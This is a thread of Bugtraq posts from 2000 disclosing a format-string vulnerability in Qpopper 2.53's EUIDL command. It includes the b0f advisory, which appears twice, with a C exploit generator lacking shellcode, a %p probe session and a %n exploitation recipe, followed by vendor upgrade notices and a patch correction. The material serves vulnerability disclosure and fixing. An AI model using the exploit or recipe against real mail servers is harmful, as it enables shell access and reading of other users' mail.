5127666 2000-05-24 18:37 /220 rader/ Postmaster
Mottagare: Bugtraq (import) <10961>
Ärende: Qpopper 2.53 remote problem
------------------------------------------------------------
user can gain =?iso-8859-1?q?gid=3Dmail?=
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Authentication-Warning: Rage.Resentment.org: rawww set sender t
prizm@Resentment.org using -f
MIME-Version: 1.0
User-Agent: IMHO/0.97.1 (Webmail for Roxen)
Content-Type: multipart/mixed;boundary="'ThIs-RaNdOm-StRiNg-/=_.441580320:"
Content-Transfer-Encoding: 8bit
Message-ID: <200005231643.JAA16829@Rage.Resentment.org>
Date: Tue, 23 May 2000 09:43:33 -800
Reply-To: Prizm <prizm@RESENTMENT.ORG>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Prizm <prizm@RESENTMENT.ORG>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
--'ThIs-RaNdOm-StRiNg-/=_.441580320:
Content-Length: 286
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset=iso-8859-1
I have attached to this message the advisory with full details +
exploit on this problem.
Prizm/b0f,
--'ThIs-RaNdOm-StRiNg-/=_.441580320:
Content-Length: 6089
Content-Disposition: attachment;filename=b0f5-Qpopper.txt
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/plain
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 5
Advisory Name: Remote shell via Qpopper2.53
Date: 5/23/00
Application: Qpopper 2.53 for *NIX
Vendor: Qualcomm Incorporated
WWW: www.qualcomm.com
Severity: can give users remote
shell with gid=mail.
Author: prizm (prizm@resentment.org)
Homepage: b0f.freebsd.lublin.pl
* Overview
Qpopper is the most widely-used server for the POP3 protocol. This allows users to
access their mail using any POP3 client. Qpopper supports the latest standards,
and includes a large number of optional features. Qpopper is normally used with
standard UNIX mail transfer and delivery agents such as sendmail or smail.
* The Problem
Yes, Qpop, again and again...
There is a bug in version 2.53 of Qpop that can give you a remote
shell with gid=mail. Problem is with euidl command which uses user input as
format string for pop_msg() function.
Lets examine following code from Qpop 2.53 source:
--> pop_uidl.c, around line 150:
................
sprintf(buffer, "%d %s", msg_id, mp->uidl_str);
if (nl = index(buffer, NEWLINE)) *nl = 0;
sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp));
! return (pop_msg (p,POP_SUCCESS, buffer));
^^^^^^^^^^^^^
.................
Function pop_msg() is declared in pop_msg.c as pop_msg(POP *p, int stat,
const char *format,...), and here we have user-input as format string. Lame.
Ok, back to problem, imagine following smtp session:
MAIL FROM:<hakker@evil.org>
200 Ok
RCPT TO:<luser@host.withqpop253.com>
200 Ok
data
200 Okey, okey. end with "."
Subject: still trust qpop?=/
X-UIDL: AAAAAAAAAAAAAAAA
From: %p%p%p%p%p%p%p
test
.
200 BLABLABLA Ok, message accepted for delivery.
Then, luser connects with his pop account and runs euidl command there:
+OK QPOP (version 2.53) at b0f starting. <666.666@b0f>
USER luser
+OK Password required for luser.
PASS secret
+OK luser has 3 messages (1644 octets).
euidl 3
+OK 2 AAAAAAAAAAAAAAAA 530
0xbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfbfd1e80x8057028
Yeah, thats from my box with FreeBSD. As you can see, our %p%p%p%p%p%p%p
where implemented as arguments for vsnprintf() command.
* Exploiting
Is this possible? Yeah, sure!
But there are some limits. Qpopper2.53 from FreeBSD ports with patches is
much more difficult to exploit than one from linux. It is because freebsd
patches change vsprintf() call in pop_msg.c to vsnprintf() call, and there is
big difference between them. Qpopper with FreeBSD's patches IS exploitable.
Exploit
-------
/* qpop_euidl.c exploit by prizm/Buffer0verflow Security
*
* Sample exploit for buffer overflow in Qpopper 2.53.
* This little proggie generates a mail u need to send.
*
* Standard disclaimer applies.
* By the way, exploit is broken =) You need to insert shellcode.
*
* MAD greets to tf8 for pointing out the bug, and all other b0f members.
* greets to USSRLabs and ADM
* check http://b0f.freebsd.lublin.pl/ for news.
*/
#include <stdio.h>
#include <string.h>
char shellcode[]="imnothing";
int main(int argc, char *argv[])
{
int i;
unsigned long ra=0;
if(argc!=2) {
fprintf(stderr,"Usage: %s return_addr\n", argv[0]);
exit(0);
}
sscanf(argv[1], "%x", &ra);
if(!ra)
return;
if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) {
fprintf(stderr,"Bad shellcode\n");
exit(0);
}
fprintf(stderr,"return address: 0x%.8x\n", ra);
printf("X-UIDL: ");
for(i=0; i < sizeof(shellcode);i++)
printf("%c", shellcode[i]);
printf("\r\n");
printf("From: %s", "%.1000d");
for(i=0; i < 50; i++)
printf("%c%c%c%c", (ra & 0xff), (ra & 0xff00)>>8, (ra & 0xff0000)>>16, (ra & 0xff000000)>>24);
printf("@test\r\n");
printf("Subject: test\r\n\r\nhuh?\r\n.\r\n");
return 0;
}
Exploiting QPOP from FreeBSD ports
----------------------------------
It is NOT easy, because vsprintf() is replaced with
vsnprintf() so we can't overflow stack, but we still have
control over it (remeber %n?). Im not going to post exploit
for this because it is really generic, but I will explain
theory on exploiting qpop with vsNprintf. There is an little
trick with %n YOu should know. Try to understand why
folowing code succeeds and prints out 2000, not sizeof(b):
---<cut>---
#include <stdio.h>
int main(void){
int s=1; char b[1024]; int q;
snprintf(b, sizeof(b), "%.2000d%n", 1, &q);
return printf("%d, overflowed? %s\n", q, (s==1?"NO":"YES"));
}
---</cut>---
On my box with FreeBSD 3.4 i have:
2000, overflowed? NO
Hah, first time i expected to see 1024, but YOu know that all is
unpredictable . So, this little thing will help us a lot.
Exploiting it:
a) Find where in stack is located user input.
b) Compose a message with filed X-UIDL and From:
X-UIDL: ppRETARETARETARETA
From: <SHELLCODE>%.RETURNd%n@test
where:
"pp" is for padding (two or three chars)
"RETA" is return address pointing to SHELLCODE
"SHELLCODE" guess
"RETURN" return address
c) Exploit? If you need an exploit that will work on FreeBSD,
code it yourself.
* Vulnerable Versions
2.53(Others?)
* Fix
You can download Qpopper 3.1 at http://www.eudora.com/freeware/qpop.html#CURRENT which
is not vulnerable to this problem.
Or you can manually patch it by doing the following:
At lines 150 and 62 from pop_msg.c, replace:
- return (pop_msg (p,POP_SUCCESS, buffer));
to:
+ return (pop_msg (p,POP_SUCCESS, "%s", buffer));
copyright © 1999-2000
prizm, buffer0verfl0w security
b0f.freebsd.lublin.pl
--'ThIs-RaNdOm-StRiNg-/=_.441580320:--
(5127666) ------------------------------------------(Ombruten)
5128312 2000-05-24 22:00 /253 rader/ Postmaster
Mottagare: Bugtraq (import) <10978>
Ärende: Security Vulnerability in Qpopper 2.53 (Upgrade to 3.0.2)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@securityfocus.com
Mime-Version: 1.0
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1" ; format="flowed"
Message-ID: <p04320305b5511470392c@[192.168.1.5]>
Date: Tue, 23 May 2000 22:45:30 -0700
Reply-To: Qpopper Support <qpopper@QUALCOMM.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Qpopper Support <qpopper@QUALCOMM.COM>
X-To: cert@cert.org, BUGTRAQ@securityfocus.com
X-cc: Prizm <prizm@resentment.org>
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by samantha.lysator.liu.se id VAA28407
Qpopper development has learned of a security vulnerability in
Qpopper 2.53 (and older). All users of Qpopper are urged to upgrade
to 3.0.2 or later.
The exploit (details below) involves sending a specially-constructed
message to a user, then logging in as that user and issuing the EUIDL
command. A successful attack can yield a shell running with group
'mail'.
It is important to note that the attack:
1. Requires the ability to log in as a user.
2. Can at most give a shell with uid of the user and gid of mail,
potentially allowing access to other user's mail.
3. Will be logged.
4. Requires Qpopper 2.53 or older. The current released version is 3.0.2.
In addition, not all sites use group 'mail' or have Qpopper set to
run with gid=mail, or have spools owned by group 'mail' and have rw
group access. However, this is a very common configuration.
Qpopper 3.0 has additional protections against buffer overflows; this
exploit proves the usefulness of this approach. While the report
says "Qpop, again and again", implying this is a recurring problem in
Qpopper; in fact there is no problem in current released versions;
only older versions are vulnerable.
Following verbatim is the report we received from
prizm@resentment.org of the vulnerability (note that it says Qpopper
3.1 is OK; Qpopper 3.0 is also OK, due to the extra precautions in
that codebase):
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o
r y # 5
Advisory Name: Remote shell via Qpopper2.53
Date: 5/23/00
Application: Qpopper 2.53 for *NIX
Vendor: Qualcomm Incorporated
WWW: www.qualcomm.com
Severity: can give users remote
shell with gid=mail.
Author: prizm (prizm@resentment.org)
Homepage: b0f.freebsd.lublin.pl
* Overview
Qpopper is the most widely-used server for the POP3 protocol.
This allows users to
access their mail using any POP3 client. Qpopper supports
the latest standards,
and includes a large number of optional features. Qpopper is
normally used with
standard UNIX mail transfer and delivery agents such as
sendmail or smail.
* The Problem
Yes, Qpop, again and again...
There is a bug in version 2.53 of Qpop that can give you a remote
shell with gid=mail. Problem is with euidl command which uses
user input as
format string for pop_msg() function.
Lets examine following code from Qpop 2.53 source:
--> pop_uidl.c, around line 150:
................
sprintf(buffer, "%d %s", msg_id, mp->uidl_str);
if (nl = index(buffer, NEWLINE)) *nl = 0;
sprintf(buffer, "%s %d %.128s", buffer, mp->length,
from_hdr(p, mp));
! return (pop_msg (p,POP_SUCCESS, buffer));
^^^^^^^^^^^^^
.................
Function pop_msg() is declared in pop_msg.c as pop_msg(POP
*p, int stat,
const char *format,...), and here we have user-input as
format string. Lame.
Ok, back to problem, imagine following smtp session:
MAIL FROM:<hakker@evil.org>
200 Ok
RCPT TO:<luser@host.withqpop253.com>
200 Ok
data
200 Okey, okey. end with "."
Subject: still trust qpop?=/
X-UIDL: AAAAAAAAAAAAAAAA
From: %p%p%p%p%p%p%p
test
.
200 BLABLABLA Ok, message accepted for delivery.
Then, luser connects with his pop account and runs euidl
command there:
+OK QPOP (version 2.53) at b0f starting. <666.666@b0f>
USER luser
+OK Password required for luser.
PASS secret
+OK luser has 3 messages (1644 octets).
euidl 3
+OK 2 AAAAAAAAAAAAAAAA 530
0xbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfbfd1e80x8057028
Yeah, thats from my box with FreeBSD. As you can see, our
%p%p%p%p%p%p%p
where implemented as arguments for vsnprintf() command.
* Exploiting
Is this possible? Yeah, sure!
But there are some limits. Qpopper2.53 from FreeBSD ports
with patches is
much more difficult to exploit than one from linux. It is
because freebsd
patches change vsprintf() call in pop_msg.c to vsnprintf()
call, and there is
big difference between them. Qpopper with FreeBSD's patches
IS exploitable.
Exploit
-------
/* qpop_euidl.c exploit by prizm/Buffer0verflow Security
*
* Sample exploit for buffer overflow in Qpopper 2.53.
* This little proggie generates a mail u need to send.
*
* Standard disclaimer applies.
* By the way, exploit is broken =) You need to insert shellcode.
*
* MAD greets to tf8 for pointing out the bug, and all other b0f members.
* greets to USSRLabs and ADM
* check http://b0f.freebsd.lublin.pl/ for news.
*/
#include <stdio.h>
#include <string.h>
char shellcode[]="imnothing";
int main(int argc, char *argv[])
{
int i;
unsigned long ra=0;
if(argc!=2) {
fprintf(stderr,"Usage: %s return_addr\n", argv[0]);
exit(0);
}
sscanf(argv[1], "%x", &ra);
if(!ra)
return;
if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) {
fprintf(stderr,"Bad shellcode\n");
exit(0);
}
fprintf(stderr,"return address: 0x%.8x\n", ra);
printf("X-UIDL: ");
for(i=0; i < sizeof(shellcode);i++)
printf("%c", shellcode[i]);
printf("\r\n");
printf("From: %s", "%.1000d");
for(i=0; i < 50; i++)
printf("%c%c%c%c", (ra & 0xff), (ra & 0xff00)>>8, (ra
& 0xff0000)>>16, (ra & 0xff000000)>>24);
printf("@test\r\n");
printf("Subject: test\r\n\r\nhuh?\r\n.\r\n");
return 0;
}
Exploiting QPOP from FreeBSD ports
----------------------------------
It is NOT easy, because vsprintf() is replaced with
vsnprintf() so we can't
overflow stack, but we still have control over it (remeber %n?).
Im not going to post exploit for this because it is really
generic, but I
will explain theory on exploiting qpop with vsNprintf.
There is an little trick with %n YOu should know. Try to
understand why
folowing code succeeds and prints out 2000, not sizeof(b):
---<cut>---
#include <stdio.h>
int main(void){
int s=1; char b[1024]; int q;
snprintf(b, sizeof(b), "%.2000d%n", 1, &q);
return printf("%d, overflowed? %s\n", q, (s==1?"NO":"YES"));
}
---</cut>---
On my box with FreeBSD 3.4 i have:
2000, overflowed? NO
Hah, first time i expected to see 1024, but YOu know that all is
unpredictable . So, this little thing will help us a lot.
Exploiting it:
a) Find where in stack is located user input.
b) Compose a message with filed X-UIDL and From:
X-UIDL: ppRETARETARETARETA
From: <SHELLCODE>%.RETURNd%n@test
where:
"pp" is for padding (two or three chars)
"RETA" is return address pointing to SHELLCODE
"SHELLCODE" guess
"RETURN" return address
c) Exploit? If you need an exploit that will work on FreeBSD,
code it yourself.
* Vulnerable Versions
2.53(Others?)
* Fix
You can download Qpopper 3.1 at
http://www.eudora.com/freeware/qpop.html#CURRENT which
is not vulnerable to this problem.
Or you can manually patch it by doing the following:
At lines 150 and 62 from pop_msg.c, replace:
- return (pop_msg (p,POP_SUCCESS, buffer));
to:
+ return (pop_msg (p,POP_SUCCESS, "%s", buffer));
copyright © 1999-2000
prizm, buffer0verfl0w security
b0f.freebsd.lublin.pl
(5128312) ------------------------------------------
5129341 2000-05-25 08:43 /35 rader/ Postmaster
Mottagare: Bugtraq (import) <10984>
Ärende: Re: Qpopper 2.53 remote problem
------------------------------------------------------------
user can gain =?iso-8859-1?q?gid=3Dmail?=
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.05.10005241300410.5839-100000@biocserver.BIOC.CWRU.Edu>
Date: Wed, 24 May 2000 13:02:52 -0400
Reply-To: Jose Nazario <jose@BIOCSERVER.BIOC.CWRU.EDU>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Jose Nazario <jose@BIOCSERVER.BIOC.CWRU.EDU>
X-To: Prizm <prizm@RESENTMENT.ORG>
X-cc: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <200005231643.JAA16829@Rage.Resentment.org>
while investigating the qpopper 2.53 source lying around to see about
this fix, i noticed they note the source patches mentioned are
incorrect. they note:
[quote]
At lines 150 and 62 from pop_msg.c, replace:
- return (pop_msg (p,POP_SUCCESS, buffer));
to:
+ return (pop_msg (p,POP_SUCCESS, "%s", buffer));
[end quote]
when infact it's lines 62 and 152 in the source file pop_uidl.c that
contain these lines (god bless grep).
just a minor correction... damn, i gotta start looking for a better
pop3d!
jose nazario jose@biochemistry.cwru.edu
PGP fingerprint: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80
Public key available at http://biocserver.cwru.edu/~jose/pgp-key.asc
(5129341) ------------------------------------------(Ombruten)
5129508 2000-05-25 09:34 /20 rader/ Postmaster
Mottagare: Bugtraq (import) <10986>
Ärende: Re: Qpopper 2.53 remote problem
------------------------------------------------------------
user can gain gid=mail
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@securityfocus.com
Mime-Version: 1.0
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
Message-ID: <p0432030cb551d13492c5@[192.168.1.5]>
Date: Wed, 24 May 2000 11:35:50 -0700
Reply-To: Qpopper Support <qpopper@QUALCOMM.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Qpopper Support <qpopper@QUALCOMM.COM>
X-To: Prizm <prizm@resentment.org>, BUGTRAQ@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <200005231643.JAA16829@Rage.Resentment.org>
This problem does not exist in Qpopper 3.0.2, which is the current
released version. Anyone using an older version of Qpopper is urged
to upgrade to 3.0.2 or later (3.1 is in beta and is available as
well).
(5129508) ------------------------------------------